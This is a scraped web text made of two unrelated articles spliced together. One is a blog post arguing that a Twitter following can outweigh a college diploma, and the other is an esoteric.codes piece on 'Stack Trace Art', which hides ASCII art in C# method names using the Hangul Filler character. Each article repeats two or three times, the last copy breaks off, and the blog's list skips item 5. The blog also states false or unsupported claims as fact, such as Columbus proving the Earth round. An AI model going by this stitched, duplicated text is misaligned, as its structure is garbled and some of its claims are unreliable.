author: Brendan Cahill description: Brendan Cahill Jun 11 · 8 min read Why a strong Twitter presence might do more for your professional success than a college diploma will. But first — why Twitter? I wouldn’t say I am a Titan of Twitter but I have used it to create a decent following that I’ve leveraged into a 6-Figure b image: http://static1.squarespace.com/static/5e860d480e72f6236141f59a/5ee27ca405e3dd0d022caee9/5ee3a3c20c342a1acf777ad5/1591976971945/Screen+Shot+2020-06-10+at+12.54.04+PM.png?format=1500w title: 7.5 Reasons Why Twitter Will Replace Your College Diploma — Brendan Cahill
Why a strong Twitter presence might do more for your professional success than a college diploma will.
I wouldn’t say I am a Titan of Twitter but I have used it to create a decent following that I’ve leveraged into a 6-Figure business at one point (you can read about that one’s unfortunate demise here) with less than 3K followers and am leveraging it once more to build new ones.
As a private coach I’ve been able to develop connections with coaches at top tier college football programs, current and former NFL Pro Bowl players and coaches and generate countless leads in referrals to my coaching business all through Twitter.
In 2020 it isn’t uncommon during an informal job interview for the interviewer to simply ask “Follow me on Twitter I’ll check your stuff out.”
Right now your brand is being built. It can be done by default by the company you’re working for or school you attend or you can do it by design, rally your tribe and create more opportunities for yourself than you ever could have dreamed a college diploma would give you alone.
The average American education path looks like this: Get good grades to get into a good high school. Get into a good high school to get good grades to get into a good college. Get into a good college to get a good job. Get a good job to have a good life.
While I am vocal critic of college, college was very good to me. I made lifelong friends, had fun, was mentored by great professors and met my future wife there. As a dating service and sleep away camp for young adults, college is unmatched.
But, as good an experience that I had in college it is impossible to ignore the combined impact that the internet, social media and brand building have all had on tearing down the monopoly that higher education once had on the American Dream.
Twitter might be the biggest disruption of them all.
In the 20th century you went to school to train to work for a famous brand. In the 21st century you are the brand that companies want to work for.
A brand is simply what someone expects from you, or your reputation.
Pre-Twitter this reputation relied on bosses and supervisors to develop for you. Now, Twitter allows you to cultivate a specific reputation with every tweet, like, retweet or comment.
In the 20th century people went to school to train to work for a famous brand.
To do this they tried their best to go to schools with famous brand names like Harvard, or Yale or Stanford. The more famous a brand of school you went to the more famous a brand company you can work for. If you want to work for Apple, you could better do it as a Standford graduate than Glendale Community College graduate.
Now, you get to decide what your reputation is. And that’s scary for a lot of companies.
We can’t read minds — yet. But, Twitter is very close.
In a few taps you can see every post, every comment, every like and every piece of content a person has ever created. You can peer into the depths of their mind and soul to see what makes people tick.
Even cooler, you can decide to drop into that thought thread and add your own valuable insight into someone’s running conversation with other like-minded people.
And, if those people resonated with anything you said, they too might drop into your own thought threads, comments and DMs to begin building a relationship with too.
If you’re looking to understand the hopes, dreams and fears of your ideal market, Twitter is a great starting point.
(As an aside — if you can find this much information out publicly on Twitter just imagine what they’ve got on you privately!)
Columbus might have proved the Earth was round in 1492 but Jack Dorsey made it flat again in 2006.
Twitter has removed all gatekeepers between you and people you want to interact with.
The Silicon Valley term for this is “disintermediation” — or removing intermediaries between people and brands.
Entire industries are based off positioning themselves at information choke points and then charging for access to that information.
Higher education positioned itself at the choke point of “how do I make sure I get a good job?” and charged handsomely for access to that information.
Now, there are 15 year old YouTube stars making 7 figures through their iPhone. It’ll be tough to convince them of the value proposition of attending a $70K/year liberal arts college when the average graduate ends up working at Starbucks for minimum wage the first few years out of college.
In theory, there is now no real barrier between you and Trump. If you tweet something outlandish enough his way, he could tweet you back and drive the next 24hr global news cycle. This is both very cool and scary.
Secretaries, mid-level management and other gatekeepers now have less power than ever over who can reach their bosses. If you have a compelling enough offer and someone sees enough value in it you can get through to anyone.
You’re just one retweet away from going viral.
Metcalfe’s law states that a network’s value compounds with every additional node added to it.
When the telegraph first came out, it was not very valuable if only one person had it. But, the more people who adopted the telegraph the more valuable it became.
And, so it is with Twitter.
If only 10 people used Twitter it would not be very valuable. But since there are 321 million active users on it (as of February 2019) and is a $3.5 billion dollar company it’s value is undeniable.
Overnight you may be retweeted by someone with 100K followers which then gives you 2,000 new followers, and 80 DMs asking you about collaborating on your new business.
Twitter isn’t bound by physics. It is a force multiplier that lets you connect with anyone, anywhere and at anytime.
Empowered by distance and not knowing you personally Twitter will viciously slay any idea it doesn’t like. This will save you a lot of potential time and frustration in market research.
You can accomplish in one tweet market research that might have cost the Mad Men of Madison Avenue $100K+ of work to do over the course of several months.
Personally, I like posting a generic tweet “Hey guys I’m looking for 8–10 people who are serious about learning a bit more about how to xyz. DM/Comment if you’d like to test run my new course”.
Then, I’ll make a private DM group (you can add up to 50 members on a single Twitter DM right now) and begin the conversation there.
While not yet clients or customers, building an audience is the first step to finding them.
Some ESPN personalities have more followers than ESPN itself does. Some NY Times reporters have more followers than the NY Times do.
Pre-Twitter, if you lost your job that was it. You would have to start over at a new company — low man on the totem pole. Now, even if you get fired from your job, you will still have your online audience that you can leverage to create revenue generating opportunities for yourself.
Better yet, losing your job always makes for a great read. You can turn it into your flagship blog post that will build your credibility and authority in your audience’s eyes as someone who know how to recover from job loss, start their own business and so on.
Twitter is the perfect first stop on building your audience and eventual sales funnel.
Twitter lets you take your following with you.
Across America the unemployment rate is through the roof. What if when you were let go because of COVID19 you simply shrugged, flipped open your Twitter account with 10K+ active audience members and tweeted out you were starting a new business or launching a new course and it made you $5K?
The days of businesses having a monopoly on your brand are over. In fact, businesses are scared to death of the power that their employees’ personal brand can now wield upon their companies. In the age of each person having their own unique brand, the faceless corporation will lose.
Right now there are multi-million dollar deals, scholarship offers, and business discussions occurring on Twitter DM.
The DM is today what email was 15 years ago — an uncluttered direct line of communication between you and someone who can say “yes” to your dream. Like the dark web, 98% of what goes on inside Twitter occurs here.
In theory, once someone follows you back they are open to you DM’ing them. I would recommend if you do DM someone you take the following guidelines:
Seek to give to that person first. Do you have something valuable that might benefit a project they are working on? Could you connect that person to someone else that they might find beneficial to know?
Seek to learn from that person first. Everyone enjoys answering questions about things they are passionate about. Craft 2–3 succinct and insightful questions regarding a post, project or podcast you heard that person on to ask.
Give it time and space. Just because you were responded to once via DM doesn’t mean you are best friends. I like a span of 2–4 days in between DM’s when trying to build a relationship with a new person.
DM’s are not a replacement for conversation but rather the first step to having one. When possible, transition your DM conversation “offline” to over the phone or email. With every cell phone number or email that person grants you permission to you build a little bit more trust.
It will just make you more or less of what you already are.
10K + followers never made anyone happy. And, money only solves money problems. Even if you are making some it won’t change who you are as a person.
Twitter and social media are great at building connections but not great at building conversations. The magic of Twitter comes when you can leverage a connection made on its platform into a real-life relationship, mentorship or friendship.
In the future everyone is going to be their own brand that companies will apply to work for. Twitter is just one of numerous other platforms where people will be able to intentionally craft that brand, make money from it and ultimately live life on their terms.
Why a strong Twitter presence might do more for your professional success than a college diploma will.
But first — why Twitter?
I wouldn’t say I am a Titan of Twitter but I have used it to create a decent following that I’ve leveraged into a 6-Figure business at one point (you can read about that one’s unfortunate demise here) with less than 3K followers and am leveraging it once more to build new ones.
As a private coach I’ve been able to develop connections with coaches at top tier college football programs, current and former NFL Pro Bowl players and coaches and generate countless leads in referrals to my coaching business all through Twitter.
In 2020 it isn’t uncommon during an informal job interview for the interviewer to simply ask “Follow me on Twitter I’ll check your stuff out.”
Right now your brand is being built. It can be done by default by the company you’re working for or school you attend or you can do it by design, rally your tribe and create more opportunities for yourself than you ever could have dreamed a college diploma would give you alone.
0.0 What is college for?
The average American education path looks like this: Get good grades to get into a good high school. Get into a good high school to get good grades to get into a good college. Get into a good college to get a good job. Get a good job to have a good life.
While I am vocal critic of college, college was very good to me. I made lifelong friends, had fun, was mentored by great professors and met my future wife there. As a dating service and sleep away camp for young adults, college is unmatched.
But, as good an experience that I had in college it is impossible to ignore the combined impact that the internet, social media and brand building have all had on tearing down the monopoly that higher education once had on the American Dream.
Twitter might be the biggest disruption of them all.
1. Twitter Treats You As A Brand
In the 20th century you went to school to train to work for a famous brand. In the 21st century you are the brand that companies want to work for.
A brand is simply what someone expects from you, or your reputation.
Pre-Twitter this reputation relied on bosses and supervisors to develop for you. Now, Twitter allows you to cultivate a specific reputation with every tweet, like, retweet or comment.
In the 20th century people went to school to train to work for a famous brand.
To do this they tried their best to go to schools with famous brand names like Harvard, or Yale or Stanford. The more famous a brand of school you went to the more famous a brand company you can work for. If you want to work for Apple, you could better do it as a Standford graduate than Glendale Community College graduate.
Now, you get to decide what your reputation is. And that’s scary for a lot of companies.
2. Twitter Is A Portal To The Soul
We can’t read minds — yet. But, Twitter is very close.
In a few taps you can see every post, every comment, every like and every piece of content a person has ever created. You can peer into the depths of their mind and soul to see what makes people tick.
Even cooler, you can decide to drop into that thought thread and add your own valuable insight into someone’s running conversation with other like-minded people.
And, if those people resonated with anything you said, they too might drop into your own thought threads, comments and DMs to begin building a relationship with too.
If you’re looking to understand the hopes, dreams and fears of your ideal market, Twitter is a great starting point.
(As an aside — if you can find this much information out publicly on Twitter just imagine what they’ve got on you privately!)
3. Twitter Made The World Flat (Again)
Columbus might have proved the Earth was round in 1492 but Jack Dorsey made it flat again in 2006.
Twitter has removed all gatekeepers between you and people you want to interact with.
The Silicon Valley term for this is “disintermediation” — or removing intermediaries between people and brands.
Entire industries are based off positioning themselves at information choke points and then charging for access to that information.
Higher education positioned itself at the choke point of “how do I make sure I get a good job?” and charged handsomely for access to that information.
Now, there are 15 year old YouTube stars making 7 figures through their iPhone. It’ll be tough to convince them of the value proposition of attending a $70K/year liberal arts college when the average graduate ends up working at Starbucks for minimum wage the first few years out of college.
In theory, there is now no real barrier between you and Trump. If you tweet something outlandish enough his way, he could tweet you back and drive the next 24hr global news cycle. This is both very cool and scary.
Secretaries, mid-level management and other gatekeepers now have less power than ever over who can reach their bosses. If you have a compelling enough offer and someone sees enough value in it you can get through to anyone.
4. Twitter Is A Hyper Network
You’re just one retweet away from going viral.
Metcalfe’s law states that a network’s value compounds with every additional node added to it.
When the telegraph first came out, it was not very valuable if only one person had it. But, the more people who adopted the telegraph the more valuable it became.
And, so it is with Twitter.
If only 10 people used Twitter it would not be very valuable. But since there are 321 million active users on it (as of February 2019) and is a $3.5 billion dollar company it’s value is undeniable.
Overnight you may be retweeted by someone with 100K followers which then gives you 2,000 new followers, and 80 DMs asking you about collaborating on your new business.
Twitter isn’t bound by physics. It is a force multiplier that lets you connect with anyone, anywhere and at anytime.
Empowered by distance and not knowing you personally Twitter will viciously slay any idea it doesn’t like. This will save you a lot of potential time and frustration in market research.
You can accomplish in one tweet market research that might have cost the Mad Men of Madison Avenue $100K+ of work to do over the course of several months.
Personally, I like posting a generic tweet “Hey guys I’m looking for 8–10 people who are serious about learning a bit more about how to xyz. DM/Comment if you’d like to test run my new course”.
Then, I’ll make a private DM group (you can add up to 50 members on a single Twitter DM right now) and begin the conversation there.
6. Twitter Builds Your Tribe
While not yet clients or customers, building an audience is the first step to finding them.
Some ESPN personalities have more followers than ESPN itself does. Some NY Times reporters have more followers than the NY Times do.
Pre-Twitter, if you lost your job that was it. You would have to start over at a new company — low man on the totem pole. Now, even if you get fired from your job, you will still have your online audience that you can leverage to create revenue generating opportunities for yourself.
Better yet, losing your job always makes for a great read. You can turn it into your flagship blog post that will build your credibility and authority in your audience’s eyes as someone who know how to recover from job loss, start their own business and so on.
Twitter is the perfect first stop on building your audience and eventual sales funnel.
Twitter lets you take your following with you.
Across America the unemployment rate is through the roof. What if when you were let go because of COVID19 you simply shrugged, flipped open your Twitter account with 10K+ active audience members and tweeted out you were starting a new business or launching a new course and it made you $5K?
The days of businesses having a monopoly on your brand are over. In fact, businesses are scared to death of the power that their employees’ personal brand can now wield upon their companies. In the age of each person having their own unique brand, the faceless corporation will lose.
7. Twitter DM is the New Email
Right now there are multi-million dollar deals, scholarship offers, and business discussions occurring on Twitter DM.
The DM is today what email was 15 years ago — an uncluttered direct line of communication between you and someone who can say “yes” to your dream. Like the dark web, 98% of what goes on inside Twitter occurs here.
In theory, once someone follows you back they are open to you DM’ing them. I would recommend if you do DM someone you take the following guidelines:
Seek to give to that person first. Do you have something valuable that might benefit a project they are working on? Could you connect that person to someone else that they might find beneficial to know?
Seek to learn from that person first. Everyone enjoys answering questions about things they are passionate about. Craft 2–3 succinct and insightful questions regarding a post, project or podcast you heard that person on to ask.
Give it time and space. Just because you were responded to once via DM doesn’t mean you are best friends. I like a span of 2–4 days in between DM’s when trying to build a relationship with a new person.
DM’s are not a replacement for conversation but rather the first step to having one. When possible, transition your DM conversation “offline” to over the phone or email. With every cell phone number or email that person grants you permission to you build a little bit more trust.
7.5 Twitter Won’t Make You Happy
It will just make you more or less of what you already are.
10K + followers never made anyone happy. And, money only solves money problems. Even if you are making some it won’t change who you are as a person.
Twitter and social media are great at building connections but not great at building conversations. The magic of Twitter comes when you can leverage a connection made on its platform into a real-life relationship, mentorship or friendship.
In the future everyone is going to be their own brand that companies will apply to work for. Twitter is just one of numerous other platforms where people will be able to intentionally craft that brand, make money from it and ultimately live life on their terms.
Why a strong Twitter presence might do more for your professional success than a college diploma will.
But first — why Twitter?
I wouldn’t say I am a Titan of Twitter but I have used it to create a decent following that I’ve leveraged into a 6-Figure business at one point (you can read about that one’s unfortunate demise here) with less than 3K followers and am leveraging it once more to build new ones.
As a private coach I’ve been able to develop connections with coaches at top tier college football programs, current and former NFL Pro Bowl players and coaches and generate countless leads in referrals to my coaching business all through Twitter.
In 2020 it isn’t uncommon during an informal job interview for the interviewer to simply ask “Follow me on Twitter I’ll check your stuff out.”
Right now your brand is being built. It can be done by default by the company you’re working for or school you attend or you can do it by design, rally your tribe and create more opportunities for yourself than you ever could have dreamed a college diploma would give you alone.
0.0 What is college for?
The average American education path looks like this: Get good grades to get into a good high school. Get into a good high school to get good grades to get into a good college. Get into a good college to get a good job. Get a good job to have a good life.
While I am vocal critic of college, college was very good to me. I made lifelong friends, had fun, was mentored by great professors and met my future wife there. As a dating service and sleep away camp for young adults, college is unmatched.
But, as good an experience that I had in college it is impossible to ignore the combined impact that the internet, social media and brand building have all had on tearing down the monopoly that higher education once had on the American Dream.
Twitter might be the biggest disruption of them all.
1. Twitter Treats You As A Brand
In the 20th century you went to school to train to work for a famous brand. In the 21st century you are the brand that companies want to work for.
A brand is simply what someone expects from you, or your reputation.
Pre-Twitter this reputation relied on bosses and supervisors to develop for you. Now, Twitter allows you to cultivate a specific reputation with every tweet, like, retweet or comment.
In the 20th century people went to school to train to work for a famous brand.
To do this they tried their best to go to schools with famous brand names like Harvard, or Yale or Stanford. The more famous a brand of school you went to the more famous a brand company you can work for. If you want to work for Apple, you could better do it as a Standford graduate than Glendale Community College graduate.
Now, you get to decide what your reputation is. And that’s scary for a lot of companies.
2. Twitter Is A Portal To The Soul
We can’t read minds — yet. But, Twitter is very close.
In a few taps you can see every post, every comment, every like and every piece of content a person has ever created. You can peer into the depths of their mind and soul to see what makes people tick.
Even cooler, you can decide to drop into that thought thread and add your own valuable insight into someone’s running conversation with other like-minded people.
And, if those people resonated with anything you said, they too might drop into your own thought threads, comments and DMs to begin building a relationship with too.
If you’re looking to understand the hopes, dreams and fears of your ideal market, Twitter is a great starting point.
(As an aside — if you can find this much information out publicly on Twitter just imagine what they’ve got on you privately!)
3. Twitter Made The World Flat (Again)
Columbus might have proved the Earth was round in 1492 but Jack Dorsey made it flat again in 2006.
Twitter has removed all gatekeepers between you and people you want to interact with.
The Silicon Valley term for this is “disintermediation” — or removing intermediaries between people and brands.
Entire industries are based off positioning themselves at information choke points and then charging for access to that information.
Higher education positioned itself at the choke point of “how do I make sure I get a good job?” and charged handsomely for access to that information.
Now, there are 15 year old YouTube stars making 7 figures through their iPhone. It’ll be tough to convince them of the value proposition of attending a $70K/year liberal arts college when the average graduate ends up working at Starbucks for minimum wage the first few years out of college.
In theory, there is now no real barrier between you and Trump. If you tweet something outlandish enough his way, he could tweet you back and drive the next 24hr global news cycle. This is both very cool and scary.
Secretaries, mid-level management and other gatekeepers now have less power than ever over who can reach their bosses. If you have a compelling enough offer and someone sees enough value in it you can get through to anyone.
4. Twitter Is A Hyper Network
You’re just one retweet away from going viral.
Metcalfe’s law states that a network’s value compounds with every additional node added to it.
When the telegraph first came out, it was not very valuable if only one person had it. But, the more people who adopted the telegraph the more valuable it became.
And, so it is with Twitter.
If only 10 people used Twitter it would not be very valuable. But since there are 321 million active users on it (as of February 2019) and is a $3.5 billion dollar company it’s value is undeniable.
Overnight you may be retweeted by someone with 100K followers which then gives you 2,000 new followers, and 80 DMs asking you about collaborating on your new business.
Twitter isn’t bound by physics. It is a force multiplier that lets you connect with anyone, anywhere and at anytime.
Empowered by distance and not knowing you personally Twitter will viciously slay any idea it doesn’t like. This will save you a lot of potential time and frustration in market research.
You can accomplish in one tweet market research that might have cost the Mad Men of Madison Avenue $100K+ of work to do over the course of several months.
Personally, I like posting a generic tweet “Hey guys I’m looking for 8–10 people who are serious about learning a bit more about how to xyz. DM/Comment if you’d like to test run my new course”.
Then, I’ll make a private DM group (you can add up to 50 members on a single Twitter DM right now) and begin the conversation there.
6. Twitter Builds Your Tribe
While not yet clients or customers, building an audience is the first step to finding them.
Some ESPN personalities have more followers than ESPN itself does. Some NY Times reporters have more followers than the NY Times do.
Pre-Twitter, if you lost your job that was it. You would have to start over at a new company — low man on the totem pole. Now, even if you get fired from your job, you will still have your online audience that you can leverage to create revenue generating opportunities for yourself.
Better yet, losing your job always makes for a great read. You can turn it into your flagship blog post that will build your credibility and authority in your audience’s eyes as someone who know how to recover from job loss, start their own business and so on.
Twitter is the perfect first stop on building your audience and eventual sales funnel.
Twitter lets you take your following with you.
Across America the unemployment rate is through the roof. What if when you were let go because of COVID19 you simply shrugged, flipped open your Twitter account with 10K+ active audience members and tweeted out you were starting a new business or launching a new course and it made you $5K?
The days of businesses having a monopoly on your brand are over. In fact, businesses are scared to death of the power that their employees’ personal brand can now wield upon their companies. In the age of each person having their own unique brand, the faceless corporation will lose.
7. Twitter DM is the New Email
Right now there are multi-million dollar deals, scholarship offers, and business discussions occurring on Twitter DM.
The DM is today what email was 15 years ago — an uncluttered direct line of communication between you and someone who can say “yes” to your dream. Like the dark web, 98% of what goes on inside Twitter occurs here.
In theory, once someone follows you back they are open to you DM’ing them. I would recommend if you do DM someone you take the following guidelines:
Seek to give to that person first. Do you have something valuable that might benefit a project they are working on? Could you connect that person to someone else that they might find beneficial to know?
Seek to learn from that person first. Everyone enjoys answering questions about things they are passionate about. Craft 2–3 succinct and insightful questions regarding a post, project or podcast you heard that person on to ask.
Give it time and space. Just because you were responded to once via DM doesn’t mean you are best friends. I like a span of 2–4 days in between DM’s when trying to build a relationship with a new person.
DM’s are not a replacement for conversation but rather the first step to having one. When possible, transition your DM conversation “offline” to over the phone or email. With every cell phone number or email that person grants you permission to you build a little bit more trust.
7.5 Twitter Won’t Make You Happy
It will just make you more or less of what you already are.
10K + followers never made anyone happy. And, money only solves money problems. Even if you are making some it won’t change who you are as a person.
Twitter and social media are great at building connections but not great at building conversations. The magic of Twitter comes when you can leverage a connection made on its platform into a real-life relationship, mentorship or friendship.
In the future everyone is going to be their own brand that companies will apply to work for. Twitter is just one of numerous other platforms where people will be able to intentionally craft that brand, make money from it and ultimately live life on their terms.
title: Stack Trace Art description: Hiding ASCII art, broken into individual lines deep in source code, to have them emerge as errors cascading through the call stack image: https://esoteric.codes/uploads/0b7abb70-edc8-4806-b916-199bb2a6f3ea-stacktraceart1.png
description: Hiding ASCII art, broken into individual lines deep in source code, to have them emerge as errors cascading through the call stack image: https://esoteric.codes/uploads/0b7abb70-edc8-4806-b916-199bb2a6f3ea-stacktraceart1.png title: Stack Trace Art
Stack Trace Art is a kind of secret drawing hidden in pieces within a program, waiting to be revealed at the right moment when invoked as an error. Igor Rončević, a Croatian programmer, discovered that you can cause an error, which as it flows through the stack, pieces together ASCII art to be revealed in the stack trace. He has not only put together a series of these, but created a tool to allow others to exploit this idea.
The stack trace is a textual representation of the call stack; the flow of subroutines calling other subroutines at any moment in a running program. Usually the stack trace is seen by programmers debugging a piece of code in their development environment, or in an error log when something has gone wrong. They are lists of methods and line numbers and not terribly interesting to look at unless you're invested in the program they belong to. Unless you're viewing ones thrown by Rončević, which are ribbons, cats, or ASCII graffiti lettering.
It's a simple idea, but one that is not so easily carried out. The error itself is nothing special: a simple C# exception. The magic happens in the class throwing the exception, which has a set of methods the error flows through: one for each line of the drawing, with the ones closer to the error further up the image and so deeper in the chain. If the image were completely filled with visible characters, this would not be hard to do: we could have a series of function names with variations of aaaaaaaaaaaaaaaaa. However, that's not enough to build the cat image above: we would need to find a way to represent spaces. Rončević's solution was to find a Unicode space that C# would not recognize as a space but something else (this is very much a Microsoft-oriented project -- actually not so much, see update below*). This symbol is the Hangul Filler character, as he explains in his post His Majesty, Hangul the Filler, his ode to the symbol that makes it all possible. Hangul Filler is a control character used in representing less common Korean characters. Starting a sequence with Hangul Filler marks the following characters as intended to be combined into a single character made up of those components, as opposed to individual letters. However, as modern Unicode offers all the combinations, even of archaic signs, of these symbols, the Filler code is now essentially a legacy symbol.
The green and blue above are the name of a method, part of the call chain
Used with Western characters, it simply looks like a space, and is obscure enough that the C# people haven't (yet) eliminated it as a valid naming character.
This approach, of using the structure of code-based systems for performance, is similar in spirit to projects like PingFS. Even more so, it resembles the project IDN by JODI, which similarly breaks down a sequence into single lines (in this case urls), and uses the location bar of the browser as the place of performance. It similarly splits up the content (even when the content is just a series of redirects) across different sites. It also resembles the project Summer by Olia Lialina, which takes apart a gif and puts each frame onto a different artist's website, to be recombined into an animation in the browser, just as the stack trace recombines function names into a picture.
In both pieces, a single work is broken into segments to be re-assembled through unusual use of an existing technology: in Stack Trace Art (which I'll call STA from here on out), through the IDE itself. Summer emphasizes the filmic quality of the gif, splitting it into individual frames, much as STA splits the individual lines of ASCII art back into lines of text. It's also filmic in that its "projector speed" may speed up or slow down depending on internet connectivity and how quickly it can download each frame from a different site. While both Summer and STA are clever hacks that provide artistic possibilities, the difference in emphasis between the two works serve as a telling contrast between artist and hacker approaches. This is particularly interesting with a hacker piece that's explicitly presented as art, and an artwork by Lialina, who describes herself as a tinkerer, and is very interested in the hobbyist web aesthetic and hacker styling (she wrote this wonderful piece about the Prof. Dr. Style that still dominates some university sites), and claims to not have considered herself an artist until the Dutch Electronic Arts Festival printed the title on her nametag in 1996.
Lialina's approach is more artist-like in the way it packages its idea. Her work is dependent on many artists contributing web space (and web uptime -- any frame going down might cause the animation to freeze). But it is a singular vision of one artist: Lialina produced the individual frames and it is ultimately of her design; the other artists lend material support but they do not re-interpret the work by, say, putting their own image on the swing on one of the frames. The idea is made understandable through its cohesive vision.
Rončević does not even attempt to create the single really cool piece that encapsulates his idea. None of the ASCII art he chose to use in STA is particularly interesting on its own, but chosen to collectively show the potential of using the tool in a variety of 2D textual content. His focus is on on making useful code so that others can easily generate their own version of Stack Trace Art, using his library, or by simply following his example. This is the hacker approach; it's more open-ended, and more openly invites others to run with the idea.
In fact, Rončević seems to doubt that he could really have been the first to have discovered this technique. He has quite a long post asking if others have created something similar, asking if there is a Lobochevski to his Bolyai. Looking past the self-comparison with some of the greatest mathematical minds of the 19th century, the thought is essentially: has really no one else thought to do this weird but really cool thing I've discovered?
It's very possible he was the first (STA is a very cool idea but a very weird way to use code!). The kind of play at work here, misuse of tools to do something entirely new is familiar to both artists and hackers. However, the answer could be that his Lobochevsky doesn't want to be found, and this leads to what I think is the most interesting potential of the work.
Stack traces have a feeling of intimacy between the programmer and a piece of code; it's what's on your screen when you dig deep into a problem to discover the behavior of code and the intentions of the coder behind it (even when that coder is yourself some time ago, with those intentions now forgotten). It's an abstract representation in service of a complex mental process. And I think STA would be best experienced when stumbled onto by accident; a piece of code backfires and you dig into it and suddenly some crazy images, which seem simply impossible to be where they are, suddenly there in the stack trace window, breaking you out of the interface. Here I'm thinking of it as a cousin to work like Joseph Moore's Meaning in Mistakes. It's a weird idea already, and I think gains a lot of power served in an unexpected context.
* Update (9/18/18): While the implementation linked to above is Microsoft-specific, this is an idea that transcends languages. It's also been implemented in node.js by Saša Matijašić.
Stack Trace Art is a kind of secret drawing hidden in pieces within a program, waiting to be revealed at the right moment when invoked as an error. Igor Rončević, a Croatian programmer, discovered that you can cause an error, which as it flows through the stack, pieces together ASCII art to be revealed in the stack trace. He has not only put together a series of these, but created a tool to allow others to exploit this idea.
The stack trace is a textual representation of the call stack; the flow of subroutines calling other subroutines at any moment in a running program. Usually the stack trace is seen by programmers debugging a piece of code in their development environment, or in an error log when something has gone wrong. They are lists of methods and line numbers and not terribly interesting to look at unless you're invested in the program they belong to. Unless you're viewing ones thrown by Rončević, which are ribbons, cats, or ASCII graffiti lettering.
It's a simple idea, but one that is not so easily carried out. The error itself is nothing special: a simple C# exception. The magic happens in the class throwing the exception, which has a set of methods the error flows through: one for each line of the drawing, with the ones closer to the error further up the image and so deeper in the chain. If the image were completely filled with visible characters, this would not be hard to do: we could have a series of function names with variations of aaaaaaaaaaaaaaaaa. However, that's not enough to build the cat image above: we would need to find a way to represent spaces. Rončević's solution was to find a Unicode space that C# would not recognize as a space but something else (this is very much a Microsoft-oriented project -- actually not so much, see update below*). This symbol is the Hangul Filler character, as he explains in his post His Majesty, Hangul the Filler, his ode to the symbol that makes it all possible. Hangul Filler is a control character used in representing less common Korean characters. Starting a sequence with Hangul Filler marks the following characters as intended to be combined into a single character made up of those components, as opposed to individual letters. However, as modern Unicode offers all the combinations, even of archaic signs, of these symbols, the Filler code is now essentially a legacy symbol.
The green and blue above are the name of a method, part of the call chain
Used with Western characters, it simply looks like a space, and is obscure enough that the C# people haven't (yet) eliminated it as a valid naming character.
This approach, of using the structure of code-based systems for performance, is similar in spirit to projects like PingFS. Even more so, it resembles the project IDN by JODI, which similarly breaks down a sequence into single lines (in this case urls), and uses the location bar of the browser as the place of performance. It similarly splits up the content (even when the content is just a series of redirects) across different sites. It also resembles the project Summer by Olia Lialina, which takes apart a gif and puts each frame onto a different artist's website, to be recombined into an animation in the browser, just as the stack trace recombines function names into a picture.
In both pieces, a single work is broken into segments to be re-assembled through unusual use of an existing technology: in Stack Trace Art (which I'll call STA from here on out), through the IDE itself. Summer emphasizes the filmic quality of the gif, splitting it into individual frames, much as STA splits the individual lines of ASCII art back into lines of text. It's also filmic in that its "projector speed" may speed up or slow down depending on internet connectivity and how quickly it can download each frame from a different site. While both Summer and STA are clever hacks that provide artistic possibilities, the difference in emphasis between the two works serve as a telling contrast between artist and hacker approaches. This is particularly interesting with a hacker piece that's explicitly presented as art, and an artwork by Lialina, who describes herself as a tinkerer, and is very interested in the hobbyist web aesthetic and hacker styling (she wrote this wonderful piece about the Prof. Dr. Style that still dominates some university sites), and claims to not have considered herself an artist until the Dutch Electronic Arts Festival printed the title on her nametag in 1996.
Lialina's approach is more artist-like in the way it packages its idea. Her work is dependent on many artists contributing web space (and web uptime -- any frame going down might cause the animation to freeze). But it is a singular vision of one artist: Lialina produced the individual frames and it is ultimately of her design; the other artists lend material support but they do not re-interpret the work by, say, putting their own image on the swing on one of the frames. The idea is made understandable through its cohesive vision.
Rončević does not even attempt to create the single really cool piece that encapsulates his idea. None of the ASCII art he chose to use in STA is particularly interesting on its own, but chosen to collectively show the potential of using the tool in a variety of 2D textual content. His focus is on on making useful code so that others can easily generate their own version of Stack Trace Art, using his library, or by simply following his example. This is the hacker approach; it's more open-ended, and more openly invites others to run with the idea.
In fact, Rončević seems to doubt that he could really have been the first to have discovered this technique. He has quite a long post asking if others have created something similar, asking if there is a Lobochevski to his Bolyai. Looking past the self-comparison with some of the greatest mathematical minds of the 19th century, the thought is essentially: has really no one else thought to do this weird but really cool thing I've discovered?
It's very possible he was the first (STA is a very cool idea but a very weird way to use code!). The kind of play at work here, misuse of tools to do something entirely new is familiar to both artists and hackers. However, the answer could be that his Lobochevsky doesn't want to be found, and this leads to what I think is the most interesting potential of the work.
Stack traces have a feeling of intimacy between the programmer and a piece of code; it's what's on your screen when you dig deep into a problem to discover the behavior of code and the intentions of the coder behind it (even when that coder is yourself some time ago, with those intentions now forgotten). It's an abstract representation in service of a complex mental process. And I think STA would be best experienced when stumbled onto by accident; a piece of code backfires and you dig into it and suddenly some crazy images, which seem simply impossible to be where they are, suddenly there in the stack trace window, breaking you out of the interface. Here I'm thinking of it as a cousin to work like Joseph Moore's Meaning in Mistakes. It's a weird idea already, and I think gains a lot of power served in an unexpected context.
* Update (9/18/18): While the implementation linked to above is Microsoft-specific, this is an idea that transcends languages. It's also been implemented in node.js by Saša Matijašić.
Stack Trace Art is a kind of secret drawing hidden in pieces within a program, waiting to be revealed at the right moment when invoked as an error. Igor Rončević, a Croatian programmer, discovered that you can cause an error, which as it flows through the stack, pieces together ASCII art to be revealed in the stack trace. He has not only put together a series of these, but created a tool to allow others to exploit this idea.
The stack trace is a textual representation of the call stack; the flow of subroutines calling other subroutines at any moment in a running program. Usually the stack trace is seen by programmers debugging a piece of code in their development environment, or in an error log when something has gone wrong. They are lists of methods and line numbers and not terribly interesting to look at unless you're invested in the program they belong to. Unless you're viewing ones thrown by Rončević, which are ribbons, cats, or ASCII graffiti lettering.
It's a simple idea, but one that is not so easily carried out. The error itself is nothing special: a simple C# exception. The magic happens in the class throwing the exception, which has a set of methods the error flows through: one for each line of the drawing, with the ones closer to the error further up the image and so deeper in the chain. If the image were completely filled with visible characters, this would not be hard to do: we could have a series of function names with variations of aaaaaaaaaaaaaaaaa. However, that's not enough to build the cat image above: we would need to find a way to represent spaces. Rončević's solution was to find a Unicode space that C# would not recognize as a space but something else (this is very much a Microsoft-oriented project -- actually not so much, see update below*). This symbol is the Hangul Filler character, as he explains in his post His Majesty, Hangul the Filler, his ode to the symbol that makes it all possible. Hangul Filler is a control character used in representing less common Korean characters. Starting a sequence with Hangul Filler marks the following characters as intended to be combined into a single character made up of those components, as opposed to individual letters. However, as modern Unicode offers all the combinations, even of archaic signs, of these symbols, the Filler code is now essentially a legacy symbol.
The green and blue above are the name of a method, part of the call chain
Used with Western characters, it simply looks like a space, and is obscure enough that the C# people haven't (yet) eliminated it as a valid naming character.
